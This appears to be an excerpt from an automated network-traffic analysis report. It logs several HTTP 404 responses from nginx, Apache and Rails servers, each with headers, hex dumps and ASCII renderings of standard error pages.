Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 15:14:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oFMq%2FHP9KxePAcG1KDjiKoYwnK%2BCgX8Y2sSDG7ijqpwvHy8uXnlfRRotC%2Fg7LTmhS1REtAEjUHve2jM9WwSRIPDJTxJ%2B9SvKF3mRUQPGr%2BYU02mCRe9ChTdquNkcHUrVTTGcrFhQW%2FhintIW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d72ade4dfac47af-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1067&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=529&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error p
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 15:14:58 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 15:15:03 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 15:15:05 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 41c18197-57bc-4078-8050-57ec7204a88dx-runtime: 0.036139content-length: 17097connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 2fd6578b-25e4-4c3f-bccc-0ed416078f32x-runtime: 0.025065content-length: 17117connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 72d2be07-b32e-486a-81fa-42a1a10e4cf0x-runtime: 0.023036content-length: 18133connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 15:16:07 GMTServer: Apache/2.4.62 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 15:16:10 GMTServer: Apache/2.4.62 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
